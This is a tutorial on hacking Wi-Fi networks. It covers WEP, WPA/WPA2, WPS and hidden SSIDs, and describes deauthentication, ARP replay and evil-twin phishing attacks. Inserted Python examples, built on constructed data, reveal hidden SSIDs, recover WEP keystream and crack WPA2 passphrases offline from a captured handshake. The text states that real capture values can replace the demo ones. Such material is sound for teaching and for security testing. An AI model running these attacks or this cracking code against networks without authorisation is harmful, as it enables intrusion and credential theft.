Wireless Hacking Tutorial
What you will learn:
• What the different flavors of wireless networks you'll encounter are, and how difficult each of them is to hack.
• What hidden networks are, and whether they offer a real challenge to an attacker.
• A rough idea of how each of the various 'flavors' of wireless network is actually hacked. (The last point is covered in detail in the next chapter.)

Wireless Security Levels

Below is a simple list of points I use to explain the various possible security implementations a wireless network may have. Suppose you are the owner of a club. There are many possible scenarios as far as entry to the club is concerned.

Open Entry

Open networks don't require a password to connect to the wireless router (access point).

1. Open entry and unrestricted usage. Anyone can walk right in. They have unrestricted access to the dance floor, free beer, etc. This is an open network. It is only used in public places (restaurants, etc.) that offer free Internet access to their users (WiFi hotspots), and it's fairly uncommon to find such networks.

2. Open entry but restricted usage. Anyone can walk right in, but they have to pay for drinks. For the router's security purposes this is also an open network; however, connecting to the wireless router (entering the club) doesn't guarantee you unrestricted access to the Internet. There is another layer of authentication. These are seen in public places (airports, restaurants, fast food joints, shopping malls) where they let you connect to the wireless network without any password, but after that you have an additional layer between you and the Internet (usually a captive portal that asks you to log in). This layer usually restricts your ability to access the Internet (by bandwidth or by time) and can be used to charge you for the amount of data you use.

The point to note in the discussion above is that wireless hacking usually refers to cracking the router's password. The additional layer that might be present between you and the Internet after you connect is something you'll have to deal with separately, and is not covered under wireless hacking. So, from a WiFi hacking perspective, both networks above are the same, "open", and do not require any hacking.
Stupidly Guarded Entry (WEP)

1. Password at the door and unrestricted access. The members of the club pay a certain amount every month and get access to free drinks. They have to say the password at the shady-looking entrance to the club. Unfortunately, it's quite easy for anyone to overhear the password and get in. This is a WEP-protected network. For a person who has Kali Linux installed on their machine, hacking this kind of wireless network is a matter of minutes. These are easy targets. However, nowadays it's fairly uncommon to find WEP-protected networks, precisely because of the ease with which they can be broken into; WPA and WPA2 are far more common.

2. Password at the door but restricted access. Only members can enter, but they still have to pay for their drinks. This is the case when the network has a password and an additional layer to get access to the Internet. This is common in two cases:
   – ISP requires login: many ISPs require users to log in to their account to access the Internet. Often logging in provides an interface that lets users see their bandwidth usage, the details of their network plan, etc.
   – Colleges/schools/offices: many institutes allocate user accounts (student IDs and passwords, for example) with which users access the institute's network and the Internet facilities it offers.

Again, from the wireless hacking perspective, both networks above are "WEP protected", and are rather simple to hack into.

Well Guarded Entry

As far as the split into whether or not another layer of authentication is present once you have the wireless network password is concerned, the WEP and WPA cases are the same; the only difference is that, say, the college wireless routers run WPA instead of WEP. That doesn't merit further discussion. However, there is another subcategory here that we will discuss.

1. Fingerprint and retinal scan for entry. The entry to this club is secure enough for most purposes. Getting past this level of security takes a lot of time and effort. Theoretically, if you're willing to do what it takes, you may still get in, but a heist (if I may call it that) of this magnitude takes a lot of planning, and even then a lot depends on sheer luck. This is a WPA-secured network. The only way to crack it is with dictionary or brute-force attacks. Brute-force attacks may take forever (literally) depending on the length of the password, and dictionary attacks will take days or weeks depending on the size of the dictionary, and may still fail (if the password is not in the dictionary). [More on this later.] So if you want to crack the password of a WPA network... get a new hobby.

2. Fingerprint and retinal scan for entry, plus a card that you can quickly swipe to avoid standing in a queue, since the aforementioned scans take some time. By introducing this card the club created an alternate path for entry. While this saves time for legitimate users, the card can be stolen, although it's not as easy as overhearing the password (WEP) or walking right in (open). This is WPA with WPS enabled. WPS has a vulnerability (its 8-digit PIN can be brute-forced) that allows an attacker to obtain the passphrase in around 3 hours (sometimes more, up to 10-12 hours, but that figure is nothing compared to WPA). Just like WEP, WPS is now a well-known weak point, and new routers either ship with WPS disabled or add measures (like rate limiting the PIN attempts) that make it really hard to, well, pickpocket the members.

Bonus: Hidden entry

Any of the above clubs could have a secret entrance. Sounds cool, right? This is somewhat similar to what we call "security through obscurity". How do you get in if you don't know where the club's entrance is? Well, while you don't know where the club's entrance is, you know where the club is.
You have two options:

1. Passive method. You go to the roof of a nearby building, take your binoculars out, and try to find out how people enter the building. In wireless terms, you wait until a client connects to the network. This may take a lot of time, but it's relatively safer from a forensic viewpoint (by not doing anything, just watching patiently, you ensure that you don't leave behind any clues that may later be used to catch you).

2. Active method. You cut off the electricity or water supply to the building, or somehow trigger the fire alarm. One way or the other, you force the members to get out of the club. Once they find out that everything is fine, they'll swarm back in, and you will know where the gate is. In wireless terms, you de-authenticate the clients (you'll be doing this often, whether you're hacking a WEP network or capturing a WPA handshake [again, more on this later]). Of course, this method leaves some traces behind, but at least you don't have to wait for hours.

The analogue of a club with a hidden entrance is a hidden network. As long as the network has clients, it's quite easy to find out the name of the network (the SSID, to be precise; setting the network to hidden basically stops the access point from advertising its SSID in its beacon frames). However, when a client looks for and connects to the network, it sends probe request and association request frames (and the AP answers with probe responses) that carry the SSID in clear text, i.e. unencrypted, and you can capture those and read the SSID. So hidden networks don't really offer much protection, and a WEP-protected hidden network just means that instead of 10 minutes it will take 15 minutes to get the password. For a WPA network, making the SSID hidden doesn't do a lot either, since WPA networks are practically uncrackable, and a person who has the time and processing power to get past WPA encryption won't be stopped by a hidden SSID.

Summary

There can be additional authentication steps (logins) or other barriers between you and the Internet even after you get access to the router. However, this is an entirely separate problem and not too relevant to the discussion of wireless hacking. Still, it's something you must be aware of:

◦ Wireless hotspots or open networks don't have any encryption. They can be accessed by anyone. Also, the data transmitted by you is not encrypted and can be read by anyone in the vicinity. Anything you send to the destination server in plain text (say, to Google) is transmitted from your machine to the wireless router in plain text, and anyone in the vicinity can easily read it using Wireshark or any similar tool. Of course, sensitive data is rarely sent in plain text, so don't sit around wireless hotspots hoping to get someone's FB login credentials. Still, the lack of encryption in open networks should be taken seriously. As far as wireless hacking is concerned, there's not a lot to do here (other than sniffing the unencrypted data in the air).

◦ WEP – This is where most of the action happens. Countless vulnerabilities, countless attacks, countless research papers listing the issues, countless tools to get the password. It doesn't take much effort to learn how to hack these. If you're familiar with Linux, it takes practically no effort at all: just some terminal commands and you're done (with wifite you don't even have to bother with that).

◦ WPA – Don't want to mess with this guy. Theoretically there's a way in; practically it takes forever. Dictionary and brute-force attacks are the methods to get in. I will cover all this in the advanced version of this guide. PS: When I say WPA, I refer to both WPA and WPA2. For the sake of this chapter, they are the same.

◦ WPA with WPS – Tough guy with a weak spot. Hit him where it hurts and 'it takes forever to get in' becomes a matter of hours. Not as easy as WEP, but still doable. Unfortunately, you might encounter a guy who has a weak spot but has started learning his lessons and guards that spot properly (WPS, but with rate limiting or some other security measure).
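To make the hidden-SSID point above concrete, here is an added example (not code from the original article or any of the tools it mentions) that parses constructed 802.11 management frames and shows where the SSID does and does not appear: a hidden AP's beacon carries an empty SSID element, while the probe request and association request a client sends when it looks for and joins the network carry the name in clear text. The MAC addresses, network name and frame contents are made up for the demonstration, and the radiotap header and frame check sequence that a real capture would carry are omitted.

```python
# Added example: where the SSID of a "hidden" network shows up in 802.11
# management frames. All frames below are constructed for the demo; real
# captures would also carry a radiotap header and a 4-byte FCS.
from typing import Dict, Optional, Tuple

MGMT_TYPE = 0
SUBTYPES = {0: "assoc-req", 4: "probe-req", 5: "probe-resp", 8: "beacon"}
# Fixed fields between the 24-byte MAC header and the tagged parameters:
# beacon/probe-resp: timestamp(8) + interval(2) + capability(2);
# assoc-req: capability(2) + listen interval(2); probe-req: none.
FIXED_LEN = {"beacon": 12, "probe-resp": 12, "assoc-req": 4, "probe-req": 0}
SSID_TAG = 0


def mgmt_frame(subtype: int, dst: bytes, src: bytes, bssid: bytes,
               fixed: bytes, ies: bytes) -> bytes:
    """Build a management frame: frame control, duration, 3 addresses, seq ctl."""
    frame_control = bytes([(subtype << 4) | (MGMT_TYPE << 2), 0x00])
    return frame_control + b"\x00\x00" + dst + src + bssid + b"\x00\x00" + fixed + ies


def ie(tag: int, value: bytes) -> bytes:
    """One tagged parameter (information element): tag, length, value."""
    return bytes([tag, len(value)]) + value


def parse_ies(data: bytes) -> Dict[int, bytes]:
    """Walk the tag/length/value list; keep the first instance of each tag."""
    ies: Dict[int, bytes] = {}
    i = 0
    while i + 2 <= len(data):
        tag, length = data[i], data[i + 1]
        ies.setdefault(tag, data[i + 2:i + 2 + length])
        i += 2 + length
    return ies


def extract_ssid(frame: bytes) -> Tuple[str, Optional[str]]:
    """Return (frame kind, ssid); ssid is None when the frame does not reveal it."""
    fc0 = frame[0]
    if (fc0 >> 2) & 0x3 != MGMT_TYPE:
        return ("not-mgmt", None)
    kind = SUBTYPES.get(fc0 >> 4)
    if kind is None:
        return ("other-mgmt", None)
    ssid = parse_ies(frame[24 + FIXED_LEN[kind]:]).get(SSID_TAG)
    # A hidden AP sends a zero-length SSID element, or one padded with NULs.
    if ssid is None or len(ssid) == 0 or ssid.count(0) == len(ssid):
        return (kind, None)
    return (kind, ssid.decode("utf-8", "replace"))


# Constructed addresses and network name (not real devices).
BROADCAST = b"\xff" * 6
AP = bytes.fromhex("02aabbccdd01")
CLIENT = bytes.fromhex("02112233440a")
REAL_SSID = b"ClubWiFi"
SUPPORTED_RATES = ie(1, bytes.fromhex("82848b960c121824"))


def hidden_beacon() -> bytes:
    """What the AP broadcasts every ~100 ms: the SSID element is empty."""
    fixed = (0).to_bytes(8, "little") + (100).to_bytes(2, "little") + b"\x11\x04"
    return mgmt_frame(8, BROADCAST, AP, AP, fixed, ie(SSID_TAG, b"") + SUPPORTED_RATES)


def directed_probe_request() -> bytes:
    """What a client that knows the network sends to find it: SSID in clear."""
    return mgmt_frame(4, BROADCAST, CLIENT, BROADCAST, b"",
                      ie(SSID_TAG, REAL_SSID) + SUPPORTED_RATES)


def association_request() -> bytes:
    """Sent when the client joins; it also carries the SSID in clear."""
    fixed = b"\x11\x04" + (10).to_bytes(2, "little")
    return mgmt_frame(0, AP, CLIENT, AP, fixed, ie(SSID_TAG, REAL_SSID) + SUPPORTED_RATES)


def ssids_seen(frames) -> Dict[str, Optional[str]]:
    """Summarise, per frame kind, what a passive observer on the channel learns."""
    return {kind: ssid for kind, ssid in (extract_ssid(f) for f in frames)}


if __name__ == "__main__":
    frames = [hidden_beacon(), directed_probe_request(), association_request()]
    for kind, ssid in ssids_seen(frames).items():
        print(f"{kind:10s} -> {ssid!r}")
```

Running it shows the beacon yielding no name while both client frames yield "ClubWiFi"; that is exactly what the passive method waits for and what the active (de-authentication) method provokes, since a kicked client immediately probes for and re-associates to its network.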
I hope you now have a general idea about the various flavors of wireless security. I have a few advanced guides in mind too, which will touch on the cryptographic specifics of these 'flavors', the vulnerabilities, and their exploits. As far as the practical hacking process is concerned, there are plenty of tutorials here on this website and elsewhere on the Internet, so I am not covering that again. I hope that the next time you read a guide you are aware of what's going on, and don't end up trying an attack that works on WEP targets against a WPA network.

Pre-requisites

You should know (all of this is covered in Wireless Hacking Basics above):
• What the different flavors of wireless networks you'll encounter are, and how difficult each of them is to hack.
• What hidden networks are, and whether they offer a real challenge to an attacker.
• A very rough idea of how each of the various 'flavors' of wireless network is actually hacked.

Post-reading

You will know:
• Even more about the different flavors of wireless networks.
• A rough idea of the cryptographic aspects of each 'flavor' of wireless network security, the vulnerabilities, and the exploits.
• How to go about hacking any given wireless network.
• The common tools and attacks used in wireless hacking.
The last two points are covered in detail in the coming chapters.
WEP, WPA and WPA2

WEP: the aim of the designers of the IEEE 802.11 standard was to write an algorithm that makes a wireless network (WLAN) as secure as a wired network (LAN). This is why the protocol was called Wired Equivalent Privacy (privacy equivalent to what is expected in a traditional wired network). Unfortunately, while in theory the idea behind WEP sounded bullet-proof, the actual implementation was very flawed. The main problems were static keys and weak IVs (the 24-bit initialization vector that is prepended to the shared key and sent in clear with every frame). For a while attempts were made to fix the problems, but nothing worked well enough (WEP2, WEPplus, etc. were made, but all failed).

WPA was a new WLAN standard that was compatible with devices built for WEP encryption. It fixed pretty much all the flaws in WEP, but the limitation of having to work with old hardware meant that some remnants of WEP's problems would continue to haunt WPA (TKIP still runs RC4 underneath). Overall, however, WPA was quite secure.

WPA2 is the latest and most robust security algorithm for wireless networks. It wasn't backwards compatible with many devices, but these days all new devices support WPA2. But wait...

In the last chapter we assumed WPA and WPA2 are the same thing. In this one I'm telling you they are quite different. What's the matter? Well, the two standards are indeed quite different. However, while it's true that there are some remnant flaws in WPA that are absent in WPA2, from an attacker's perspective the technique to hack the two networks is often the same. Why?

• Very few tools exist that carry out the attacks against WPA networks properly (the absence of proof-of-concept scripts means that you have to do everything from scratch, which most people can't).
• All these attacks work only under certain conditions (the key renewal period must be large, QoS must be enabled, etc.).

Because of these reasons, despite WPA being a little less secure than WPA2, most of the time an attacker has to use brute-force/dictionary attacks and the other methods he would use against WPA2, practically making WPA and WPA2 the same thing from his perspective.

PS: There's more to the WPA/WPA2 story than what I've captured here. Actually, "WPA" and "WPA2" are ambiguous descriptions, and the actual intricacies (PSK, CCMP, TKIP, 802.1X/EAP and AES, with respect to the cipher used and the authentication used) would require diving further into the Personal and Enterprise versions of both WPA and WPA2.

How to Hack

Now that you know the basics of all these networks, let's get to how they are actually hacked. I will only name the attacks here; further details will be provided in the coming tutorials.

WEP

The initialization vector (IV) passed to the RC4 cipher is the weakness of WEP. Most of the attacks rely on inherent weaknesses in the IVs. Basically, if you collect enough of them, you will recover the key.
1. Passive method

◦ If you don't want to leave behind any footprints, the passive method is the way to go. In this you simply listen on the channel the network is on and capture the data packets (airodump-ng). These packets give you IVs, and with enough of them you can crack the key (aircrack-ng). I already have a tutorial on this method, which you can read here: Hack WEP using aircrack-ng suite.

2. Active methods

◦ ARP request replay. The passive method can be incredibly slow, since you need a lot of packets (there's no way to say exactly how many; it can literally be anything, due to the statistical nature of the attack, but usually the number of packets required ends up in five digits). Getting that many packets can be time-consuming. However, there are many ways to speed the process up. The basic idea is to initiate some sort of conversation on the network, and then capture the packets that arise as a result. The problem is that not all frames are encrypted data frames carrying IVs. So, without having the key to the AP, you have to make it generate packets with IVs. One of the best ways to do this is by replaying ARP requests: an encrypted ARP request can be recognised by its fixed size even without the key, and every time you replay it the AP re-broadcasts it (and the target replies) under a fresh IV. So once you have captured at least one ARP packet, you can generate as many IVs as you need. This is called the ARP request replay attack. We have a tutorial for this attack as well: ARP request replay attack.
◦ Chopchop attack
◦ Fragmentation attack
◦ Caffe Latte attack
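The following is an added example (not code from the original article or from the aircrack-ng project) that shows in a few dozen lines of Python the property all of the WEP attacks above are built on: the per-frame RC4 key is just IV || shared key, so two frames that share an IV share a keystream, and a frame whose first bytes are known (every ARP or IP frame starts with the same 8-byte LLC/SNAP header, which is why ARP frames are so useful) hands you those keystream bytes for that IV without knowing the key. The chopchop and fragmentation attacks extend exactly this recovered keystream. The 40-bit key, the IV and both frames are constructed for the demonstration, and the key-index byte that follows the IV on the air is left out.

```python
# Added example: why a known-plaintext frame under WEP leaks keystream, and why
# IV reuse is fatal. Key, IVs and frame contents are constructed for the demo.
import struct
import zlib
from typing import Tuple


def rc4(key: bytes, length: int) -> bytes:
    """Plain RC4: key-scheduling, then generate `length` keystream bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    while len(out) < length:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(iv: bytes, key: bytes, plaintext: bytes) -> bytes:
    """WEP body: IV (3 bytes, in clear) || RC4(IV || key) XOR (plaintext || CRC-32 ICV)."""
    icv = struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)
    keystream = rc4(iv + key, len(plaintext) + 4)
    return iv + xor(plaintext + icv, keystream)


def wep_decrypt(frame: bytes, key: bytes) -> bytes:
    """Inverse of wep_encrypt; raises if the ICV does not match."""
    iv, body = frame[:3], frame[3:]
    plain = xor(body, rc4(iv + key, len(body)))
    data, icv = plain[:-4], plain[-4:]
    if struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF) != icv:
        raise ValueError("ICV mismatch")
    return data


# Every ARP frame starts with this LLC/SNAP header (last two bytes: EtherType
# 0x0806). This is the "known plaintext" the keystream-recovery attacks rely on.
LLC_SNAP_ARP = bytes.fromhex("aaaa030000000806")
LLC_SNAP_IP = bytes.fromhex("aaaa030000000800")


def recover_keystream(frame: bytes, known_plaintext: bytes) -> Tuple[bytes, bytes]:
    """(iv, keystream prefix) for a frame whose leading bytes are known.
    No key needed: ciphertext XOR plaintext = keystream."""
    iv, body = frame[:3], frame[3:]
    return iv, xor(body[:len(known_plaintext)], known_plaintext)


def decrypt_prefix(frame: bytes, iv: bytes, keystream: bytes) -> bytes:
    """Use keystream recovered from one frame to read another frame with the same IV."""
    if frame[:3] != iv:
        raise ValueError("different IV: this keystream does not apply")
    return xor(frame[3:3 + len(keystream)], keystream)


# Constructed scenario: a 40-bit WEP key, and two frames the AP happened to send
# with the same IV (only 2^24 IVs exist, so reuse is routine on a busy network).
KEY = bytes.fromhex("0badc0ffee")
IV = bytes.fromhex("010203")
ARP_REQUEST = LLC_SNAP_ARP + bytes.fromhex("0001080006040001") + bytes(20)
IP_PACKET = LLC_SNAP_IP + bytes.fromhex("45000054abcd4000") + bytes(12)


def demo() -> dict:
    """Attacker side: recognise the ARP frame by its size, recover 8 keystream
    bytes from it, and read the first 8 bytes of any other frame under that IV."""
    arp_frame = wep_encrypt(IV, KEY, ARP_REQUEST)
    ip_frame = wep_encrypt(IV, KEY, IP_PACKET)
    iv, keystream = recover_keystream(arp_frame, LLC_SNAP_ARP)
    leaked = decrypt_prefix(ip_frame, iv, keystream)
    return {
        "keystream_correct": keystream == rc4(IV + KEY, 8),
        "leaked_prefix": leaked,
        "ethertype": leaked[6:8].hex(),
        "roundtrip": wep_decrypt(arp_frame, KEY) == ARP_REQUEST,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

Note that the recovered keystream is only valid for that one IV, which is why the attacks either wait for IVs to repeat (passive) or make the AP produce frames whose plaintext is predictable (ARP replay) and grow the known keystream byte by byte (chopchop, fragmentation) until a full forged frame can be encrypted.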
WPA2 (and WPA)

There are no vulnerabilities here that you can easily exploit. The only two options we have are to guess the password or to fool a user into giving us the password.

1. Guess the password. For guessing something you need two things: guesses and validation. Basically, you need to be able to make a lot of guesses, and also be able to verify whether they are correct or not. The naive way would be to enter the guesses into the password field your OS provides when connecting to the WiFi. That would be slow, since you'd have to do it manually. Even if you wrote a script for it, it would take time, since you have to communicate with the AP for every guess (multiple times per guess, too). Basically, validation by asking the AP every time is slow. So, is there a way to check the correctness of a guess without asking the AP? Yes, but only if you have a 4-way handshake. Basically, you need to capture the series of packets transmitted when a valid client connects to the AP. If you have these packets (the 4-way handshake), you can validate your guesses against them offline: each guess is turned into a key, the key is used to recompute the integrity check (MIC) on a captured handshake message, and a match means the guess was right. More details on this later, but I hope the abstract idea is clear. There are a few different ways of guessing the password.

◦ Brute force – Tries all possible passwords. It is guaranteed to work, given sufficient time. However, even for alphanumeric passwords of length 8, brute force takes incredibly long. This method might be useful if the password is short and you know it's composed only of digits.

◦ Wordlist/dictionary – In this attack there's a list of words that are candidates for the password. These wordlist files contain English words, combinations of words, misspellings of words, and so on. There are some huge wordlists, many GBs in size, and many networks can be cracked using them. However, there's no guarantee that the password of the network you're trying to crack is in the list. These attacks do complete within a reasonable time frame.

◦ Rainbow table – The validation against the 4-way handshake that I mentioned earlier involves hashing the plaintext password, and the result is then used to check the captured handshake. However, that hashing (WPA uses PBKDF2: 4096 rounds of HMAC-SHA1) is a CPU-intensive task and is the limiting factor in the speed at which you can test keys (this is the reason there are so many tools that use the GPU instead of the CPU to speed up cracking). A possible solution is for the person who created the wordlist to also convert the plaintext passwords into hashes, so that they can be checked directly. Unfortunately, WPA2 uses a salt while hashing, which means that two networks with the same password have different hashes if they use different salts. How does WPA2 choose the salt? It uses the network's name (SSID), so two networks with the same SSID and the same password do have the same hash. The guy who made the wordlist therefore has to create separate hashes for every possible SSID. Practically, what happens is that hashes are generated for the most common SSIDs (the defaults a router ships with: linksys, netgear, belkin, etc.). If the target network has one of those SSIDs, the cracking time is reduced significantly by using the precomputed hashes. This precomputed table of hashes is (loosely) called a rainbow table. Note that these tables are significantly larger than the wordlists. So, while we save time while cracking the password, we have to use a much larger file (some are hundreds of GBs) instead of a smaller one. This is referred to as the time-memory trade-off. Published tables exist that cover the 1000 most common SSIDs.

2. Fool a user into giving you the password. Basically this is just a combination of man-in-the-middle and social engineering attacks; more specifically, a combination of an evil twin and phishing. In this attack you first force a client to disconnect from the original WPA2 network, then force him to connect to a fake open network that you create, and then send him a login page in his browser where you ask him to enter the password of the network. You might be wondering why we need to keep the network open and then ask for the password in the browser (can't we just create a WPA2 network and let the user give us the password directly?). The answer lies in the fact that WPA2 performs mutual authentication during the 4-way handshake. Basically, the client verifies that the AP is legit and knows the password, and the AP verifies that the client is legit and knows the password (throughout the process the password is never sent in plaintext). Without the password, we just don't have the information necessary to complete the 4-way handshake.
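To tie the "guess the password" discussion together, here is an added example (not code from the original article or from aircrack-ng/hashcat) that walks through what a dictionary attack actually checks against a captured 4-way handshake: passphrase and SSID go into PBKDF2 to produce the PMK (which is why the SSID acts as the salt and why precomputed tables are per SSID), the PMK plus both MAC addresses and both nonces produce the PTK, and the first 16 bytes of the PTK are the key that authenticates the EAPOL-Key message, so a recomputed MIC that matches the captured one confirms the guess. The MAC addresses, nonces, SSID, passphrase and wordlist are constructed; the message 2 frame is built here to look like a real RSN EAPOL-Key frame with an empty key-data field, and the "captured" frame is produced by simulating the legitimate client.

```python
# Added example: offline validation of WPA2-PSK passphrase guesses against a
# captured 4-way handshake. Addresses, nonces, SSID, passphrase and wordlist are
# constructed for the demo; no packets are sent or captured.
import hashlib
import hmac
from typing import Dict, Optional


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    The SSID is the salt, so the same passphrase yields a different PMK per network."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF: concatenate HMAC-SHA1(key, label || 0x00 || data || i), i = 0..3."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """The PTK binds the PMK to this AP, this client and this handshake's nonces."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


MIC_OFFSET, MIC_LEN = 81, 16   # position of the Key MIC field inside an EAPOL-Key frame


def eapol_key_msg2(snonce: bytes, mic: bytes = bytes(16)) -> bytes:
    """An RSN EAPOL-Key frame as the client sends it in message 2 (key data left empty)."""
    body = (b"\x02"                          # descriptor type: RSN
            + b"\x01\x0a"                    # key info: pairwise, MIC present, descriptor version 2
            + b"\x00\x00"                    # key length (zero in message 2)
            + (1).to_bytes(8, "big")         # replay counter
            + snonce                         # SNonce (32 bytes)
            + bytes(16) + bytes(8) + bytes(8)  # key IV, key RSC, key ID (unused in message 2)
            + mic
            + b"\x00\x00")                   # key data length 0
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body   # 802.1X header: v1, EAPOL-Key


def compute_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """Descriptor version 2: HMAC-SHA1 over the frame with the MIC field zeroed, truncated to 16."""
    zeroed = eapol_frame[:MIC_OFFSET] + bytes(MIC_LEN) + eapol_frame[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def check_guess(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes,
                captured_msg2: bytes) -> bool:
    """The whole point: recompute the MIC from a candidate PMK and compare."""
    kck = ptk_from_pmk(pmk, aa, spa, anonce, snonce)[:16]
    return compute_mic(kck, captured_msg2) == captured_msg2[MIC_OFFSET:MIC_OFFSET + MIC_LEN]


def crack(wordlist, ssid, aa, spa, anonce, snonce, captured_msg2) -> Optional[str]:
    """Dictionary attack: one PBKDF2 per guess, which is the expensive step."""
    for guess in wordlist:
        if check_guess(pmk_from_passphrase(guess, ssid), aa, spa, anonce, snonce, captured_msg2):
            return guess
    return None


def precompute_table(wordlist, ssid) -> Dict[bytes, str]:
    """Per-SSID PMK table (what the text loosely calls a rainbow table): PBKDF2 done once."""
    return {pmk_from_passphrase(word, ssid): word for word in wordlist}


def crack_with_table(table, aa, spa, anonce, snonce, captured_msg2) -> Optional[str]:
    """Same check, but the expensive PBKDF2 step was paid for when the table was built."""
    for pmk, word in table.items():
        if check_guess(pmk, aa, spa, anonce, snonce, captured_msg2):
            return word
    return None


# Constructed handshake. Values from a real capture would simply replace these.
SSID = "ClubWiFi"
TRUE_PASSPHRASE = "freebeer2014"
AA = bytes.fromhex("02aabbccdd01")          # AP (authenticator) MAC
SPA = bytes.fromhex("02112233440a")         # client (supplicant) MAC
ANONCE = hashlib.sha256(b"anonce-demo").digest()
SNONCE = hashlib.sha256(b"snonce-demo").digest()
WORDLIST = ["password", "linksys", "freebeer", "freebeer2014", "club wifi"]


def captured_message2() -> bytes:
    """Simulate the legitimate client: it knows the passphrase and signs message 2."""
    kck = ptk_from_pmk(pmk_from_passphrase(TRUE_PASSPHRASE, SSID), AA, SPA, ANONCE, SNONCE)[:16]
    return eapol_key_msg2(SNONCE, compute_mic(kck, eapol_key_msg2(SNONCE)))


if __name__ == "__main__":
    msg2 = captured_message2()
    print("dictionary:", crack(WORDLIST, SSID, AA, SPA, ANONCE, SNONCE, msg2))
    print("table     :", crack_with_table(precompute_table(WORDLIST, SSID), AA, SPA, ANONCE, SNONCE, msg2))
```

Two things follow directly from the code. First, a table built for the SSID "linksys" is useless against "ClubWiFi" even when the passphrase is the same, which is the time-memory trade-off described above. Second, nothing here talks to the AP: given message 2 (or any later message) of one handshake, every guess is checked locally, and the only thing limiting speed is how fast you can run PBKDF2, hence the GPU crackers.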
3. Bonus: WPS vulnerability and reaver. [I have covered it in detail separately, so I'm not explaining it again (I'm only human, and a very lazy one too).]

[Figure: The WPA2 4-way handshake procedure. Both the AP and the client authenticate each other.]